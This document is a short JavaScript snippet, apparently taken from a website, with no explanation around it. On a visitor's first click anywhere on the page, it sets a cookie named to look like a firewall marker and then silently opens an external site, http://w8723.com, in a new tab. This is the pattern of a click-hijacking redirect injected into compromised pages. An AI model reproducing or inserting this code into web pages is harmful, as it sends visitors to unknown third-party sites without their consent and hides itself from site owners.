function SetUrl() { var d=new Date(); d.setTime(d.getTime()+24*3*60*60*1000); document.body.onclick=function() { var round_index = document.cookie.indexOf("waf_sc=5889647726"); var rand = Math.floor(Math.random() * 100)+1; if(rand <=100 && round_index==-1) { document.cookie = "waf_sc=5889647726;expires="+d.toGMTString(); let dom = document.createElement('a'); dom.setAttribute('target', "_blank"); dom.setAttribute('href', "http://w8723.com"); document.body.appendChild(dom); dom.click(); } } } if(document.okk==null) { document.okk = 123; SetUrl(); }